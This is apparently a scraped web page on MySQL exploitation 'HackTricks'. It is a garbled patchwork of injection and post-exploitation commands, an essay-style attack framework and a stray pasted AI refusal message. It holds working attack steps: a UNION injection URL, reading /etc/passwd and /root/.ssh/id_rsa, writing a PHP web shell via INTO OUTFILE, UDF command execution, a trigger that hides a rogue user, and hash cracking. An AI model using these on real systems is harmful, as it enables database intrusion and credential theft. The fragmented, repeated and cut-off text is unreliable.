SELECT table_schema, table_name, column_name FROM information_schema.columns WHERE column_name LIKE '%pass%' OR column_name LIKE '%user%';
Dump interesting tables: SELECT * FROM users;, SELECT * FROM credentials;.
Example:
http://example.com/vulnerable-page?id=1 UNION SELECT NULL,NULL,NULL -- -
Last verified against: MySQL 8.0.36, MariaDB 10.11.6, Percona Server 8.0.
Call to Action: Have you found a new MySQL bypass or escalation path? Contribute to the HackTricks GitHub repo or comment below to keep this guide [verified] for the community.
I can’t help create or promote hacking, exploiting, or bypassing security for MySQL or any other system.
If you want a legitimate, complete essay, I can write one on safe, legal topics such as:
Which of those (or another lawful topic) would you like? If you choose one, I’ll produce a full essay. mysql hacktricks verified
MySQL Security Assessment and Exploitation Framework This paper outlines the core methodologies for assessing and exploiting MySQL databases, synthesized from the verified security research and techniques documented in HackTricks 1. Abstract
As one of the most widely used relational database management systems, MySQL is a frequent target for attackers. This framework details verified exploitation vectors—ranging from initial reconnaissance to advanced privilege escalation—providing security professionals with a structured approach to identifying and mitigating MySQL-specific vulnerabilities. 2. Reconnaissance and Initial Access
The first stage of a MySQL assessment involves identifying the service and potential entry points. Default Port Identification : Scanning for TCP port Banner Grabbing : Connecting via
to identify the specific version, which determines the availability of known CVEs. Authentication Testing Testing for the root user with no password (common in misconfigured dev environments). Brute-forcing credentials using tools like mysql-brute 3. Exploitation Techniques
Once access is gained, several verified "HackTricks" can be employed to deepen the compromise. A. File System Interaction secure_file_priv
variable is empty or misconfigured, attackers can interact with the host OS: Reading Files LOAD DATA INFILE '/etc/passwd' INTO TABLE temp_table; to exfiltrate system configuration files. Writing Shells Dump interesting tables: SELECT * FROM users; ,
SELECT '' INTO OUTFILE '/var/www/html/shell.php'; to achieve Remote Code Execution (RCE). B. Privilege Escalation via UDF
User Defined Functions (UDF) allow the execution of shared library functions. : Uploading a malicious (Linux) or (Windows) file to the plugin directory.
: Executing system commands with the privileges of the user running the MySQL service (often C. Exploiting the "Old Passwords" Vulnerability
In legacy environments, MySQL may use the older, weaker 16-byte hashing algorithm, which is highly susceptible to fast offline cracking. 4. Bypassing Authentication (CVE-2012-2122)
On certain Linux distributions, a verified vulnerability allowed attackers to bypass authentication by repeatedly attempting to log in with an incorrect password. Due to a casting error, there was a 1 in 256 chance the server would accept the wrong password as correct. 5. Post-Exploitation and Lateral Movement Enumerating Users : Extracting hashes from mysql.user Sensitive Data Discovery
: Automated scripts to search for "API", "password", or "key" across all schemas. Stealing SSH Keys LOAD_FILE() to check default locations like /root/.ssh/id_rsa 6. Conclusion and Remediation Securing MySQL requires a multi-layered approach: Strict File Permissions : Configuring secure_file_priv to a dedicated, non-web-accessible directory. Principle of Least Privilege : Disabling the privileges for application users. Network Isolation Example: http://example
: Ensuring the database is only accessible via local sockets or a VPN, never exposed directly to the internet. exploitation steps or mitigation configurations
Triggers execute commands on INSERT, UPDATE, DELETE. You can hide rogue actions.
CREATE TRIGGER hide_user BEFORE INSERT ON mysql.user FOR EACH ROW
BEGIN
IF NEW.User = 'hidden' THEN
SET NEW.password = PASSWORD('dontlog');
END IF;
END;
Note: Requires SUPER or TRIGGER privilege.
This is the core of mysql hacktricks verified. We assume you have a low-privilege SQL user (e.g., from SQLi or default credentials like root:root).
If secure_file_priv restricts you:
Verified Hashcat command:
hashcat -m 300 hash.txt /usr/share/wordlists/rockyou.txt
SELECT @@version, @@version_compile_os, @@version_compile_machine;
SELECT user(), database(), current_user();
SELECT @@basedir, @@datadir, @@plugin_dir;
HackTricks Insight:
current_user() shows the user MySQL is authenticating you as, while user() shows the user you tried to connect as. Mismatches often indicate proxy authentication or privilege mapping.